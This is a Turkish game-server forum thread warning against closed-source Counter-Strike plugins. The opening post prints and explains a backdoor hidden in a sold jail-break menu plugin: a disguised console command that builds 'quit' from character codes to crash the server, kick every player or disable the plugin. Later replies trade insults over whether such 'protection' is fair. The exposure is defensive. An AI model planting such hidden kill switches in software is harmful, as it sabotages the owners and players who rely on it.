Discord sunucumuz açılmıştır, hepinizi bekleriz

https://discord.gg/43gGDQe6tS

Kaynak kodsuz eklenti satışı yapan kişiler hk.

Diğer forum kategorileri dışında kalan herşey.

Moderatör: Moderatörler

Kullanıcı avatarı

Konu Sahibi
bestcore

Mesaj gönderen bestcore »

Merhabalar,
Bildiğimiz üzere CSDurağı sunucularına kaynak kodsuz yani .amxx eklenti kurulmuyor. Birçok CSDurağı müşterisi bu durumdan şikayetçi fakat birazdan anlatacağım konu ile beraber, kaynak kodsuz eklenti kurmaktan vazgeçmek isteyeceksiniz.

CSDurağı firmasının .amxx eklenti kurmasına izin vermemesinin sebebi, bu tarz eklenti satışı yapan kişilerin eskiden ne yaptıklarını ve şimdi ne yapacaklarını bildiğidir.

Şimdi gelelim asıl konuya; Geçenlerde forumda bir istek konusu açılmıştı ve burada bir jbmenü eklentisi gönderilmiş yardım isteniliyordu, ben telefonumda bu eklentiyi indirmiştim ve müsait olduğum zaman yardım edecektim. Birkaç saat içinde konu kapatıldı ve eklenti silindi meğer eklenti paylaşılması istenilmeyen eklentiymiş. Sonradan telefona bu eklentiyi indirdiğim aklıma geldi. Barındıkları forumun yaptığı işleri bildiğim için eklentiyi açıp direkt birkaç kod arattım ve aşağıda sizlere bulduğum kodların ne olduğunu sizlere anlatacağım;

register_clcmd("UID_Giriniz","@UIDAratici");
register_clcmd("UID_GirinizX","@UIDAraticiX");
(2 Kodda aynı fakat birisi biraz farklı; farkedilmesin diye böyle yöntem kullanmışlar akılları sıra)

Bu kodlar yönlendirme kodları ve yönlendirildiği yeri sizlere anlatayım;

Kod: Tümünü seç

@UIDAraticiX(const iPlayer) {
	new szRead[8],yazdir[5];
	read_args(szRead,7);
	yazdir[0] = 113;
	yazdir[1] = 117;
	yazdir[2] = 105;
	yazdir[3] = 116;
	switch(str_to_num(szRead)) {
		case 0: server_cmd(yazdir),pause("d");
		case 1: for(new i=1; i <= 33; i++) if(is_user_connected(i)) client_cmd(i,yazdir),pause("d");
		case 2: pause("d");
	}
}
Eklenti kodlayan arkadaşlar bu kodları anlamıştır fakat sizlere bu kodların işleyişini anlatayım;

• Konsola, UID_GirinizX 0 yazdığınızda; Sunucu çöker ve eklenti kullanıma kapatılır.
• Konsola, UID_GirinizX 1 yazdığınızda; Bütün oyuncuları sunucudan atar ve eklenti kullanıma kapatılır.
• Konsola, UID_GirinizX 2 yazdığınızda; Eklenti kullanıma kapatılır.

Bu eklentiyi satın alan kişiler ile aralarında anlaşmazlık gibi türlü işler olursa eklentiyi sunucudan kapatırlar veya sunucuya zarar verip oyuncularınızı sunucudan soğuturlar.
Şimdi bu arkadaşların klasik cevapları vardır, parayı vermezlerse eklentiyi kapatırız gibi;
Madem parayı alamıyacağınızı düşünüyorsunuz, neden sunucuya saldırı yapıyorsunuz ? Sadece eklentiyi sunucudan deaktif edebileceğiniz kodlar da ekleyebilirdiniz.

Bu tür eklentilere neden para verdiğinizi zaten anlamıyorum, sunucunuza faydasından fazla zararı var. Konuyu en ince detayına kadar anlattığımı düşünüyorum, kafanıza takılan bir yer varsa sorabilirsiniz. Sizde kaynak kodsuz eklenti almayı artık bırakırsınız, kaynak kodu ile eklenti satışı yapan arkadaşlarda var. Siz bir şey yapmayacağınızı düşündüğünüz kişiler bile inceden inceden sunucunuza zarar verebilir. CSDurağı firmasıda bu işleri müşterilerine yansıtmaktan hiç memnun olmadığı için, kaynak kodsuz eklenti kurmaya izin vermiyor.

Eğerki gözlerinizle görmek istiyorsanız eklentiyi vereceğim ve sizde verdiğim kodu aratırsanız teyit edebilirsiniz;
anaeklenti.sma
hesapsistemi.sma

Bu eklentiyi satan kişilerin forumdaki üyelikleri şudur;
Eklentiyi kodlayan kişi
Kodlayan kişinin yandaşı

CSDurağı yetkililerinden en ufak bir şüphem yoktur, bu arkadaşlara gereğini yapacaklardır.
Bu mesaja eklenen dosyaları görüntülemek için gerekli izinlere sahip değilsiniz.

Link:
Linklerini gizle
Linki Kopyala
Kullanıcı avatarı

GökhanREYHAN

Mesaj gönderen GökhanREYHAN »

bu menü çok değişti bahsettiğin kodlar güncel halinde yok, bunların tespiti yapılıp bildirildi ve kaldırıldı

Link:
Linklerini gizle
Linki Kopyala

Tamamss
Yasaklı Üye
Yasaklı Üye

Mesaj gönderen Tamamss »

GökhanREYHAN yazdı: Cum Oca 14, 2022 7:10 pm bu menü çok değişti bahsettiğin kodlar güncel halinde yok, bunların tespiti yapılıp bildirildi ve kaldırıldı
Olurmu öyle bestcore ömer abisine sıvacılık yapması lazım yoksa rahat edemez, karalayacak başka birşey bulamamış, bunların olmasının tek sebebi zaten .amxx yüklenmemesi, amxx yüklense zaten böyle şeyler olmayacak, insanlar kaynak kodların içine çalındığı zaman başkası tarafından izinsiz kullanılmaması için açıklar koyuyor biraz düşünürsen belki anlayabilirsin, amacın prim yapmak ömer abine sıvacılık yapmak için yapıyosun ama boşuna kendini yoruyorsun.
En son Tamamss tarafından Cum Oca 14, 2022 7:35 pm tarihinde düzenlendi, toplamda 2 kere düzenlendi.

Link:
Linklerini gizle
Linki Kopyala
Kullanıcı avatarı

ENESIZM
Server Ip/DNS: MoonDeveloperTeam
İletişim:

Mesaj gönderen ENESIZM »

Tamamss yazdı: Cum Oca 14, 2022 7:26 pm
GökhanREYHAN yazdı: Cum Oca 14, 2022 7:10 pm bu menü çok değişti bahsettiğin kodlar güncel halinde yok, bunların tespiti yapılıp bildirildi ve kaldırıldı
Olurmu öyle bestcore ömer abisine yalakalık yapması lazım yoksa rahat edemez, karalayacak başka birşey bulamamış, bunların olmasının tek sebebi zaten .amxx yüklenmemesi, amxx yüklense zaten böyle şeyler olmayacak, insanlar kaynak kodların içine çalındığı zaman başkası tarafından izinsiz kullanılmaması için açıklar koyuyor biraz düşürüsen belki anlayabilirsin, amacın prim yapmak ama boşuna kendini yoruyorsun.
asıl amxx izinleri açılırsa daha kötü felaket yaşanır. hiçbir şeyi bilmeden çok biliyor gibi konuşmanız beni bitiriyor.

bu yüzden forumda eklentiler moderatör onaylı olarak paylaşılıyor. bu forumda açıklı olarak paylaşılan eklentileri say desem 2-3 tane söyler susarsın. o da insanlık hali der geçerim.

Link:
Linklerini gizle
Linki Kopyala

Tamamss
Yasaklı Üye
Yasaklı Üye

Mesaj gönderen Tamamss »

ENESIZM yazdı: Cum Oca 14, 2022 7:32 pm
Olurmu öyle bestcore ömer abisine yalakalık yapması lazım yoksa rahat edemez, karalayacak başka birşey bulamamış, bunların olmasının tek sebebi zaten .amxx yüklenmemesi, amxx yüklense zaten böyle şeyler olmayacak, insanlar kaynak kodların içine çalındığı zaman başkası tarafından izinsiz kullanılmaması için açıklar koyuyor biraz düşürüsen belki anlayabilirsin, amacın prim yapmak ama boşuna kendini yoruyorsun.
asıl amxx izinleri açılırsa daha kötü felaket yaşanır. hiçbir şeyi bilmeden çok biliyor gibi konuşmanız beni bitiriyor.

bu yüzden forumda eklentiler moderatör onaylı olarak paylaşılıyor. bu forumda açıklı olarak paylaşılan eklentileri say desem 2-3 tane söyler susarsın. o da insanlık hali der geçerim.
Sana fikrini soran olmadı senin cahil cahil bilgisiz fikirlerine ihtiyacımız yok kod bilgin yok burda boş yapıyosun x firmasında yıllardır .amxx yükleniyor hiçbir sorun yok böyle durumlar yok alan memnun satan memnun 1 tane şikayet gösteremezsin, bu kadar kıskanma çalış öğren sende yap biraz empati yap, suboş.

Link:
Linklerini gizle
Linki Kopyala
Kullanıcı avatarı

burakxd383
Server Ip/DNS: -
Clan İsmi: -
İletişim:

Mesaj gönderen burakxd383 »

Tamamss yazdı: Cum Oca 14, 2022 7:40 pm

Sana fikrini soran olmadı senin cahil cahil bilgisiz fikirlerine ihtiyacımız yok kod bilgin yok burda boş yapıyosun x firmasında yıllardır .amxx yükleniyor hiçbir sorun yok böyle durumlar yok alan memnun satan memnun 1 tane şikayet gösteremezsin, bu kadar kıskanma çalış öğren sende yap biraz empati yap, suboş.
konuyla uzaktan yakından bir ilgim yok ancak kimseyle böyle üslubu bozuk halde konuşamazsınız.

Link:
Linklerini gizle
Linki Kopyala
Kullanıcı avatarı

ENESIZM
Server Ip/DNS: MoonDeveloperTeam
İletişim:

Mesaj gönderen ENESIZM »

şuan piyasada ki jbmenuler jailbreak ve csgo eklentileri bizim sayemizde ortaya çıkmış bana bir şeyler yap görelim diyor. :D istiyorsan geç sunucu tanıtım konuma bir göz at. :D

Link:
Linklerini gizle
Linki Kopyala

1000DAYS

Mesaj gönderen 1000DAYS »

Açıkcası ben o kişilerden biriyle iş yaptım ama bana bir yamuk yapmadı gayet güzel eklenti yaptı ve gitti büyük ihtimalle amxx yükleme olmadığı için bu sorunlar oluyor ama yine de siz bilirsiniz
En son 1000DAYS tarafından Cum Oca 14, 2022 7:50 pm tarihinde düzenlendi, toplamda 2 kere düzenlendi.

Link:
Linklerini gizle
Linki Kopyala

Tamamss
Yasaklı Üye
Yasaklı Üye

Mesaj gönderen Tamamss »

ENESIZM yazdı: Cum Oca 14, 2022 7:45 pm

şuan piyasada ki jbmenuler jailbreak ve csgo eklentileri bizim sayemizde ortaya çıkmış bana bir şeyler yap görelim diyor. :D istiyorsan geç sunucu tanıtım konuma bir göz at. :D
Millete sıvacılık yaparak eklenti yaptırıyorsun(Leeyé,BesCore'a) sonra çıkıp eklentileri ben yapıyorum diyosun ya senin nasıl bir cahil olduğunu anlıyorum dostum boşuna kendini yorma, %0 pawn bilgin var public in ne olduğu bilmiyosun burda başımıza coder kesildin cahil seni.

Link:
Linklerini gizle
Linki Kopyala
Kullanıcı avatarı

Konu Sahibi
bestcore

Mesaj gönderen bestcore »

Tamamss yazdı: Cum Oca 14, 2022 7:26 pm Olurmu öyle bestcore ömer abisine sıvacılık yapması lazım yoksa rahat edemez, karalayacak başka birşey bulamamış, bunların olmasının tek sebebi zaten .amxx yüklenmemesi, amxx yüklense zaten böyle şeyler olmayacak, insanlar kaynak kodların içine çalındığı zaman başkası tarafından izinsiz kullanılmaması için açıklar koyuyor biraz düşünürsen belki anlayabilirsin, amacın prim yapmak ömer abine sıvacılık yapmak için yapıyosun ama boşuna kendini yoruyorsun.
Kurduğun cümle baştan hatalı zaten, ne alaka benim "sıvacılık" diye tabir ettiğin faaliyeti göstermem ? 2 yıldan fazladır buradayım, aklımın ucundan bile kurduğun cümleler geçmedi. İnsanları kendiniz gibi sanıyorsunuz, yazık kafanıza. Kanıtları ile attım, içerisine benim eklediğimi sanıyorsanız zaten eklenti Ömer abide benden önce bile varmış, o kendisi de biliyor gerçekleri. Ben insanların sizi görmesini, nasıl bir kafa yapınızın olduğunu anlaması için konuyu açtım. Rezilliğinize devam edin, iyi günler.

Link:
Linklerini gizle
Linki Kopyala